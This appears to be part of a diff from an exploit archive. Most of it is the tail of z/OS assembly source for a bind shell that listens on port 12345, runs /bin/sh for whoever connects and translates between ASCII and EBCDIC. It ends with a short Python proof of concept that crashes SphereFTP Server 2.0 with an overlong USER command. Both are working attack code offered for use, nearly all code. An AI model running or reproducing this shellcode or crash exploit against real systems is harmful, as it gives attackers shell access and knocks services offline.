MVC SOCK_SIN_ADDR,LISTADDR # listen on 0.0.0.0
DROP 5
CALL (15),(SRVFD,SOCKLEN,SRVSKT, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,3
L 6,RTN_VAL
CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPX1LSN (listen) listen on created socket - inline *
* *
***********************************************************************
LLIST L 15,BLSN # load func addr to 15
CALL (15),(SRVFD,BACKLOG, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,4
L 6,RTN_VAL
CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPX1ACP (accept) - accept conn from socket - inline *
* *
***********************************************************************
LACPT L 15,BACP # load func addr to 15
LA 5,CLISKT # addr of our socket address
USING SOCKADDR,5 # set up addressing for sock struct
XC SOCKADDR(8),SOCKADDR #zero sock addr struct
MVI SOCK_FAMILY,AF_INET
MVI SOCK_LEN,(SOCK#LEN+SOCK_SIN#LEN)
DROP 5
CALL (15),(SRVFD,CLILEN,CLISKT, x
CLIFD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,5
L 6,CLIFD
CIB 6,-1,8,EXITP # R6 = -1? Time to exit
****************************************************
* Set clifd and child fd read to non_blocking *
****************************************************
@SNB1 LARL 14,@SNB2
LA 2,F_GETFL # get file status flags
L 5,CLIFD # client sock fd
XR 6,6 # for getfd, arg is 0
BRC 15,LFCNTL # call dupe2
@TFLAG DC F'0'
@SNB2 ST 7,@TFLAG # R7 will have our flags
LA 5,O_NONBLOCK # add non-blocking flag
OR 7,5 # or to add the flag to R7
LARL 14,@SNB3
LA 2,F_SETFL # set file status flags
L 5,CLIFD # client sock fd
LR 6,7 # put new flags in R6
BRC 15,LFCNTL # call dupe2
@SNB3 LARL 14,@SNB4
LA 2,F_GETFL # get file status flags
L 5,CFDR # child fd read
XR 6,6 # for getfd, arg is 0
BRC 15,LFCNTL # call dupe2
@SNB4 ST 7,@TFLAG # R7 will have our flags
LA 5,O_NONBLOCK # add non-blocking flag
OR 7,5 # or to add the flag to R7
LARL 14,@READCLI # when we ret, enter main loop
LA 2,F_SETFL # set file status flags
L 5,CFDR # child fd read
LR 6,7 # put new flags in R6
BRC 15,LFCNTL # call dupe2
***********************************************************************
* *
* Main read from client socket looop starts here *
* *
***********************************************************************
@READCLI L 5,CLIFD # read from CLIFD
LA 7,@READCFD # Nothing read, return to here
LARL 14,@A2E1 # Bytes read, return to here
BRC 15,LREAD # Brach to read function
*******************************
* CALL A2E *
* change CLIBUF from *
* ASCII to EBCDIC *
*******************************
@A2E1 LARL 14,@CCW1 # load return area in r14
BRC 15,CONVAE # call e2a func
@CCW1 LARL 14,@READCFD # after write, read child fd
L 5,PFDW # write to child process fd
BRC 15,LWRITE # call write function
***********************************************************************
* *
* Read from child fd loop starts here *
* *
***********************************************************************
@READCFD L 5,CFDR # read from child fd
LA 7,@READCLI # nothing read, back to socket read
LARL 14,@E2A1 # Bytes read, return to here
BRC 15,LREAD # Branch to read function
*******************************
* CALL E2A *
* change CLIBUF from *
* EBCIDIC to ASCII *
*******************************
@E2A1 LARL 14,@CCW2 # load return area in r14
BRC 15,CONVEA # call e2a func
@CCW2 LARL 14,@READCFD # loop read child proc fd after write
L 5,CLIFD # write to client socked fd
BRC 15,LWRITE # call write function
********************************************************
* Functions beyond this point, no more inline *
* execution beyond here should occur *
********************************************************
***********************************************************************
* *
* BPX1RED (read) - function *
* R5 has file descriptor to read from *
* R7 has nothing read address *
* R14 has good read return address *
* *
***********************************************************************
LREAD L 15,BRED # load func addr to 15
ST 5,@TRFD # file descriptor we are reading
ST 7,@NRA # no bytes read: return address
ST 14,SAVEAREA # bytes read: return address
XR 1,1 # clear R1
ST 1,BREAD # clear Bytes Read
L 5,CLIBUF # clibuf addr
XC 0(52,5),0(5) # 0 out cli buf
BRAS 0,@CRED # jump to call
@TRFD DC 4XL1'0' # temp var for rd to read
@NRA DC 4XL1'0' # temp var for not read ret addr
@CRED CALL (15),(@TRFD,CLIBUF,ALET,CLIREAD, x
BREAD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
* for non-blocking fd's we have to check *
* both the return val and code to make sure *
* it didn't fail just b/c non-blocking and no *
* data available vs just a read error *
****************************************************
L 14,SAVEAREA # bytes read RA
L 7,@NRA # no bytes read RA
LHI 15,6 # exit code for this function
L 6,BREAD # bytes read (aka rtn val)
CIB 6,0,2,0(14) # bytes read, process them
CIB 6,0,8,0(7) # OK rtn code, on to nobyte read
L 6,RTN_COD # load up return code
LA 1,EWOULDBLOCK # load up the non-blocking RTNCOD
LA 2,EAGAIN # load up the other OK nblck RTNCOD
CRB 6,1,8,0(7) # OK rtn code, on to nobyte read
CRB 6,2,8,0(7) # OK rtn code, on to nobyte read
BRAS 0,EXITP # -1 and not due to blocking, exit
***********************************************************************
* *
* BPX1WRT (WRITE) - function *
* R5 has file descriptor to read from *
* *
***********************************************************************
LWRITE L 15,BWRT # load func addr to 15
ST 5,@TWFD # store fd in temp fd
ST 14,SAVEAREA # save return address
BRAS 0,@CWRT # jump to write
@TWFD DC A(*) # temp holder for fd
@CWRT CALL (15),(@TWFD,CLIBUF,ALET,BREAD, x
BWRIT,RTN_COD,RSN_COD),VL
**************************************************************
* chk return code here anything but neg 1 is ok *
* exit if a match (8) *
**************************************************************
L 14,SAVEAREA # restore return address
LHI 15,9 # exit code for this func
L 6,BWRIT # set r6 to rtn val
CIB 6,-1,8,EXITP # exit if R6 = -1
BCR 15,14 # back to return address
***********************************************************************
* *
* BPX1FCT (fcntl) edit file descriptor *
* for dup2 set R2=F_DUPFD2 *
* R5=fd to modify R6=fd to set R5 equal to *
* equivalent to dupe2(R5,R6) *
* for read flags, set R2=F_GETFL *
* R5=fd, R6=0, R7=rtn flags *
* for write flags, set R2=F_SETFL *
* R5=fd, R6=<new flags> R7=0 *
* for close, set R2=F_CLOSFD *
* R5=R6 = fd to close (optionally R5 & R6 can be a range *
* of FDs to close) *
* *
***********************************************************************
LFCNTL L 15,BFCT # load func addr to 15
ST 14,SAVEAREA # save return address
ST 5,@FFD # fd to be duplicated
ST 2,@ACT # action field for BPX1FCT
ST 6,@ARG # r6 should have the biggest fd
BRAS 0,@FCTL
@FFD DC F'0'
@ACT DC F'0'
@ARG DC F'0'
@RETFD DC F'0'
@FCTL CALL (15),(@FFD,@ACT,@ARG,@RETFD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,11 # exit code for this func
L 7,@RETFD # set r6 to rtn val
CIB 7,-1,8,EXITP # r6 = -1 exit
L 14,SAVEAREA # reload ret address
BCR 15,14 # return to caller
***********************************************************************
* *
* BPX1PIP (pipe) create pipe - no input *
* returns: R5=read fd R6=write fd *
* *
***********************************************************************
LPIPE L 15,BPIP # load func addr to 15
ST 14,SAVEAREA # save return address
BRAS 0,@PIP
@RFD DC F'0' # read file desc
@WFD DC F'0' # write file desc
@PIP CALL (15),(@RFD,@WFD,RTN_VAL,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,12 # exit code for this func
L 6,BWRIT # set r6 to rtn val
CIB 6,-1,8,EXITP
L 5,@RFD # load R5 with read fd
L 6,@WFD # load R6 with write fd
L 14,SAVEAREA # reload ret address
BCR 15,14 # return to caller
***********************************************************************
* *
* CONVAE - convert CLIBUF ascii to ebcidic *
* function looks up ascii byte and returns ebcdic *
* expects return address in R14 *
* *
***********************************************************************
CONVAE LHI 6,1 # R6 has number 1
L 4,BREAD # num of bytes read
L 1,CLIBUF # address of cli sock input
LOOP1 L 2,A2E # address of a2e buff
SR 2,6 # subtract 1 from R2 addr
LB 3,0(0,1) # Load byte from cli into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 2,3 # add ascii val to a2e buff
LB 3,0(0,2) # load byte from a2e buff into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
STC 3,0(0,1) # store R3 byte back into cli buff
AR 1,6 # increment client buff
SR 4,6 # sub1 from ctr, loop if non-neg
BRC 7,LOOP1 # looop
BCR 15,14 # return to caller
***********************************************************************
* *
* CONVEA - convert CLIBUF ebcidic to ascii *
* function looks up ebcidic byte and returns ascii *
* expects return address in R14 *
* *
***********************************************************************
CONVEA LHI 6,1 # R6 has number 1
L 4,BREAD # num of bytes read
L 1,CLIBUF # address of cli sock input
LOOP2 L 2,E2A # address of e2a buff
SR 2,6 # subtract 1 from R2 addr
LB 3,0(0,1) # Load byte from cli into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 2,3 # add ascii val to e2a buff
LB 3,0(0,2) # load byte from e2a buff into R3
STC 3,0(0,1) # store R3 byte back into cli buff
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 1,6 # increment client buff
SR 4,6 # sub1 from ctr, loop if non-neg
BRC 7,LOOP2 # looop
BCR 15,14 # return to caller
****************************************************
* cleanup & exit *
* preload R15 with exit code *
****************************************************
GOODEX XR 15,15 # zero return code
EXITP ST 15,0(,11)
L 13,4(,11)
LM 14,12,12(13) # restore registers
LARL 5,SAVEAREA
L 15,0(0,5)
BCR 15,14 # branch to caller
**********************
**********************
* *
* Constant Sections *
* *
**********************
**********************
@CONST DS 0F # constants full word boundary
SAVEAREA DC X'00000000'
DC X'00000000'
ALET DC F'0'
O_NONBLOCK EQU X'04' # bit for nonblocking io
EWOULDBLOCK EQU X'44E' # rtncod for nonblk read sock
EAGAIN EQU X'70' # rtncod for nonblk, not thr
*************************
* Function addresses * # pipe variables
*************************
FFUNC DC A(BFRK) # address of first function
NUMFUNC DC F'11' # number of funcs listed below
BFRK DC CL8'BPX1FRK ' # Fork
BEXC DC CL8'BPX1EXC ' # Exec
BSOC DC CL8'BPX1SOC ' # Socket
BBND DC CL8'BPX1BND ' # Bind
BLSN DC CL8'BPX1LSN ' # Listen
BACP DC CL8'BPX1ACP ' # Accept
BRED DC CL8'BPX1RED ' # Read
BWRT DC CL8'BPX1WRT ' # Write
BCLO DC CL8'BPX1CLO ' # Close
BFCT DC CL8'BPX1FCT ' # Fcntl
BPIP DC CL8'BPX1PIP ' # Pipe
*************************
* Socket conn variables * # functions used by pgm
*************************
LISTSOCK DC XL2'3039' # port 12345
LISTADDR DC XL4'00000000' # address 0.0.0.0
BACKLOG DC F'1' # 1 byte backlog
DOM DC A(AF_INET) # AF_INET = 2
TYPE DC A(SOCK#_STREAM) # stream = 1
PROTO DC A(IPPROTO_IP) # ip = 0
DIM DC A(SOCK#DIM_SOCKET) # dim_sock = 1
SRVFD DC A(*) # server FD
SRVSKT DC 16XL1'77' # srv socket struct
SOCKLEN DC A(SOCK#LEN+SOCK_SIN#LEN)
CLILEN DC A(*) # len of client struct
CLISKT DC 16XL1'88' # client socket struct
CLIFD DC A(*) # client fd
************************
* BPX1PIP vars ********* # pipe variables
************************
CFDR DC F'0' # child proc FD read
CFDW DC F'0' # child proc FD write
PFDR DC F'0' # parent proc FD read
PFDW DC F'0' # parent proc FD write
************************
* BPX1FRK vars *********
************************
CPROCN DC F'-1' # child proc #
************************
* BPX1EXC vars *********
************************
EXCMD DC CL7'/bin/sh' # command to exec
EXCMDL DC A(L'EXCMD) # len of cmd to exec
EXARGC DC F'1' # num of arguments
EXARG1 DC CL2'sh' # arg 1 to exec
EXARG1L DC A(L'EXARG1) # len of arg1
EXARGL DC A(EXARG1) # addr of argument list
EXARGLL DC A(EXARG1L) # addr of arg len list
EXENVC DC F'0' # env var count
EXENVL DC F'0' # env var arg list addr
EXENVLL DC F'0' # env var arg len addr
EXITRA DC F'0' # exit routine addr
EXITPLA DC F'0' # exit rout parm list addr
**************************
* Socket read/write vars *
**************************
CLIREAD DC A(L'@CBUF) # one less than buf
CLIBUF DC A(@CBUF) # buff for read cli sock
@CBUF DC 52XL1'22'
BREAD DC F'0' # bytes read
BWRIT DC F'0' # bytes written
*********************
* Return value vars *
*********************
RTN_VAL DC A(*) # return value
RTN_COD DC A(*) # return code
RSN_COD DC A(*) # reason code
***************************
***** end of constants ****
***************************
****************************************************
* ebcidic to ascii lookup *
* read hex(ebcidic char) bytes from beginning of *
* array to get ascii byte *
****************************************************
E2ABUF DC X'0102039c09867f978d8e0b0c0d0e0f101112139d0a08871819928fX
1c1d1e1f808182838485171b88898a8b8c0506079091169394959604X
98999a9b14159e1a20a0e2e4e0e1e3e5e7f1a22e3c282b7c26e9eaebX
e8edeeefecdf21242a293b5e2d2fc2c4c0c1c3c5c7d1a62c255f3e3fX
f8c9cacbc8cdcecfcc603a2340273d22'
DC X'd8616263646566676869abbbf0fdfeb1b06a6b6c6d6e6f707172aaX
bae6b8c6a4b57e737475767778797aa1bfd05bdeaeaca3a5b7a9a7b6X
bcbdbedda8af5db4d77b414243444546474849adf4f6f2f3f57d4a4bX
4c4d4e4f505152b9fbfcf9faff5cf7535455565758595ab2d4d6d2d3X
d530313233343536373839b3dbdcd9da'
DC X'9f'
E2A DC A(E2ABUF)
****************************************************
* ascii to ebcidic lookup *
* read hex(ascii char) bytes from beginning of *
* array to get ebcidic byte *
****************************************************
A2EBUF DC X'010203372d2e2f1605150b0c0d0e0f101112133c3d322618193f27X
1c1d1e1f405a7f7b5b6c507d4d5d5c4e6b604b61f0f1f2f3f4f5f6f7X
f8f97a5e4c7e6e6f7cc1c2c3c4c5c6c7c8c9d1d2d3d4d5d6d7d8d9e2X
e3e4e5e6e7e8e9ade0bd5f6d79818283848586878889919293949596X
979899a2a3a4a5a6a7a8a9c04fd0a107'
DC X'202122232425061728292a2b2c090a1b30311a333435360838393aX
3b04143eff41aa4ab19fb26ab5bbb49a8ab0caafbc908feafabea0b6X
b39dda9b8bb7b8b9ab6465626663679e687471727378757677ac69edX
eeebefecbf80fdfefbfcbaae594445424643479c4854515253585556X
578c49cdcecbcfcce170dddedbdc8d8e'
DC X'df'
A2E DC A(A2EBUF)
BPXYSOCK LIST=YES # MACRO MAP for socket structure
BPXYFCTL LIST=YES # MACRO MAP for fcntl structure
END @SETUP

16
platforms/windows/dos/38072.py Executable file
View file

@ -0,0 +1,16 @@
#!/usr/bin/python
# Exploit Title: SphereFTP Server v2.0 Remote Crash PoC
# Date: 2015-09-02
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.menasoft.com/blog/?p=32
# Software Link: http://www.menasoft.com/sphereftp/sphereftp_win32_v20.zip
# Version: 2.0
# Tested on: Microsoft Windows XP Professional SP3
import socket
target = '192.168.0.166'
exploit = "A" * 1000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,21))
s.send("USER "+exploit+"\r\n")
s.close()